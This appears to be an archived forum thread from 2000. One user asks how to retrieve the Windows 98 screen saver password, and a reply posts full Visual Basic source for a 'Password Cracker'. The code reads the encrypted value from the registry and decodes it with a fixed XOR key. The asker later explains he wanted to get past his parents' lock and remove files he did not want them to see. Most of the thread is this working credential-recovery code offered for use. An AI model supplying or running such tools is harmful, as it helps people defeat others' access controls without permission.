PDA

Click to See Complete Forum and Search --> : Screen Saver password

agent
Jun 16th, 2000, 09:26 AM
Is there an easy way to get the screen saver password for windows 98? Is it stored in the registry or in the [username].pwl file? I need to return the password, not verify it.
Jul 5th, 2000, 07:00 PM
'**************************************
'Windows API/Global Declarations for :Sh
' owScreensaverpwd
'**************************************
'Save it as crackpwd.bas
'----------------8< Cut here --------
' ---------------------------------
Attribute VB_Name = "Module1"
Public Const READ_CONTROL = &H20000
Public Const STANDARD_RIGHTS_READ = (READ_CONTROL)
Public Const STANDARD_RIGHTS_WRITE = (READ_CONTROL)
Public Const KEY_QUERY_VALUE = &H1
Public Const KEY_SET_VALUE = &H2
Public Const KEY_CREATE_SUB_KEY = &H4
Public Const KEY_ENUMERATE_SUB_KEYS = &H8
Public Const KEY_NOTIFY = &H10
Public Const KEY_CREATE_LINK = &H20
Public Const SYNCHRONIZE = &H100000
Public Const STANDARD_RIGHTS_ALL = &H1F0000
Public Const KEY_READ = ((STANDARD_RIGHTS_READ Or _
KEY_QUERY_VALUE Or KEY_ENUMERATE_SUB_KEYS Or KEY_NOTIFY) _
And (Not SYNCHRONIZE))
Public Const KEY_WRITE = ((STANDARD_RIGHTS_WRITE Or _
KEY_SET_VALUE Or KEY_CREATE_SUB_KEY) And (Not SYNCHRONIZE))
Public Const KEY_ALL_ACCESS = ((STANDARD_RIGHTS_ALL Or _
KEY_QUERY_VALUE Or KEY_SET_VALUE Or KEY_CREATE_SUB_KEY _
Or KEY_ENUMERATE_SUB_KEYS Or KEY_NOTIFY Or KEY_CREATE_LINK) _
And (Not SYNCHRONIZE))
Public Const KEY_EXECUTE = ((KEY_READ) And (Not SYNCHRONIZE))
Public Const ERROR_SUCCESS = 0&


Declare Function RegOpenKeyEx Lib "advapi32.dll" _
Alias "RegOpenKeyExA" (ByVal hKey As Long, _
ByVal lpSubKey As String, ByVal ulOptions As Long, _
ByVal samDesired As Long, phkResult As Long) As Long


Declare Function RegQueryValueEx Lib "advapi32.dll" _
Alias "RegQueryValueExA" (ByVal hKey As Long, _
ByVal lpValueName As String, ByVal lpReserved As Long, _
lpType As Long, lpData As Any, lpcbData As Long) As Long


Declare Function RegCloseKey Lib "advapi32.dll" _
(ByVal hKey As Long) As Long
'Module Function------------------------
' ----------------------------------------
' ---------------


Function sdaGetRegEntry(strKey As String, _
strSubKeys As String, strValName As String, _
lngType As Long) As String
'* Demonstration of win32 API's to query
'
' the system registry
' Stu Alderman -- 2/30/96
On Error Goto sdaGetRegEntry_Err
Dim lngResult As Long, lngKey As Long
Dim lngHandle As Long, lngcbData As Long
Dim strRet As String


Select Case strKey
Case "HKEY_CLASSES_ROOT": lngKey = &H80000000
Case "HKEY_CURRENT_CONFIG": lngKey = &H80000005
Case "HKEY_CURRENT_USER": lngKey = &H80000001
Case "HKEY_DYN_DATA": lngKey = &H80000006
Case "HKEY_LOCAL_MACHINE": lngKey = &H80000002
Case "HKEY_PERFORMANCE_DATA": lngKey = &H80000004
Case "HKEY_USERS": lngKey = &H80000003
Case Else: Exit Function
End Select

If Not ERROR_SUCCESS = RegOpenKeyEx(lngKey, _
strSubKeys, 0&, KEY_READ, _
lngHandle) Then Exit Function

lngResult = RegQueryValueEx(lngHandle, strValName, _
0&, lngType, ByVal strRet, lngcbData)
strRet = Space(lngcbData)
lngResult = RegQueryValueEx(lngHandle, strValName, _
0&, lngType, ByVal strRet, lngcbData)

If Not ERROR_SUCCESS = RegCloseKey(lngHandle) Then _
lngType = -1&

sdaGetRegEntry = strRet

sdaGetRegEntry_Exit:
On Error Goto 0
Exit Function
sdaGetRegEntry_Err:
lngType = -1&
MsgBox Err & "> " & Error$, 16, _
"GenUtils/sdaGetRegEntry"
Resume sdaGetRegEntry_Exit
End Function
'End Function



'**************************************
' Name: ShowScreensaverpwd
' Description:This source code show how
' simple it is to crack the windows screen
' saver password!
NEW! I've fixed some Bugs...
' By: Sebastian
'
'
' Inputs:Just start the form.
'
' Returns:It shows the password with the
' Print command...
'
'Assumes:Just copy the code below and pa
' st it into the notepad. Save it as crack
' pwd.bas (Windows API) and crackpwd.frm!
' Then add it to a new projekt and start i
' t.
'
'Side Effects:None
'

'Save it as crackpwd.frm, add crackpwd.b
' as (the code above)
'and compile it!
'-------------- 8< Cut here----------
' ----------------------------------------
' --
VERSION 5.00
Begin VB.Form Form1
BackColor=&H00000000&
BorderStyle =4 'Festes Werkzeugfenster
Caption ="Password Cracker"
ClientHeight=4905
ClientLeft =45
ClientTop=300
ClientWidth =6855


ForeColor=&H00FFFFFF&
LinkTopic="Form1"
MaxButton=0'False
MinButton=0'False
ScaleHeight =4905
ScaleWidth =6855
ShowInTaskbar=0'False
StartUpPosition =3 'Windows-Standard
End
Attribute VB_Name = "Form1"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False


Private Sub Form_Load()
Me.Show

Print
Print "Read Registry..."
Print
Print "Screensaver Password: " + Screensavepwd

End Sub


Function Screensavepwd() As String
'Dim's for the Registry
Dim lngType As Long, varRetString As Variant
Dim lngI As Long, intChar As Integer
'Dim's for the Password decoding
Dim Ciphertext As String, Key As String
Dim temp1 As String, temp2 As String
'Registry Path to the encrypted Password
'
varRetString = sdaGetRegEntry("HKEY_CURRENT_USER", _
"Control Panel\desktop", "ScreenSave_Data", "1")

'the Encrypted Password
Ciphertext = varRetString


If Len(Ciphertext) <> 1 Then
Ciphertext = Left$(varRetString, Len(Ciphertext) - 1)
Print Ciphertext
'Micro$oft's "Secret" Key
Key = "48EE761D6769A11B7A8C47F85495975F414141"

'XOR every Ciphertextbyte with the Keyby
' te to get
'the plaintext


For i = 1 To Len(Ciphertext) Step 2
temp1 = Hex2Dez(Mid$(Ciphertext, i, 2))
temp2 = Hex2Dez(Mid$(Key, i, 2))
plaintext = plaintext + Chr(temp1 Xor temp2)
Next i
Screensavepwd = plaintext
Else
Screensavepwd = " no Password"
End If
End Function


Function Hex2Dez&(H$)


If Left$(H$, 2) <> "&H" Then
H$ = "&H" + H$
End If
Hex2Dez& = Val(H$)
End Function
agent
Jul 5th, 2000, 09:24 PM
Well done my friend. Thank you very much for this code. Just one question: how did you find 'Micro$oft's "Secret" Key'?

[Edited by agent on 07-05-2000 at 10:28 PM]
Jul 5th, 2000, 10:08 PM
I did not actually write the code. I got it from http://www.planet-source-code.com..great place to get stuff. I will give you the link to where I got it from and you may ask the author yourself.

http://www.planet-source-code.com/vb/scripts/ShowCode.asp?lngWId=1&txtCodeId=2360

Glad it worked out for you. Did you ever think anybody was going to answer this? ;]
agent
Jul 6th, 2000, 11:49 PM
At the time, I needed it. My parents decided that I was unfit to use their computer (I was also grounded off of mine) So they put in a screen saver password.
My intention was to remove some files that I didn't want the parents to see. I got around needing the password by grabbing a spare keybord for my computer and removing the files over the network.
I think I could still use the the screen saver pasword getter thing to my advantage.
I didn't figure anybody would answer the message at all, because nobody answered it in the first three days. That's usually a sign that a message won't get answered.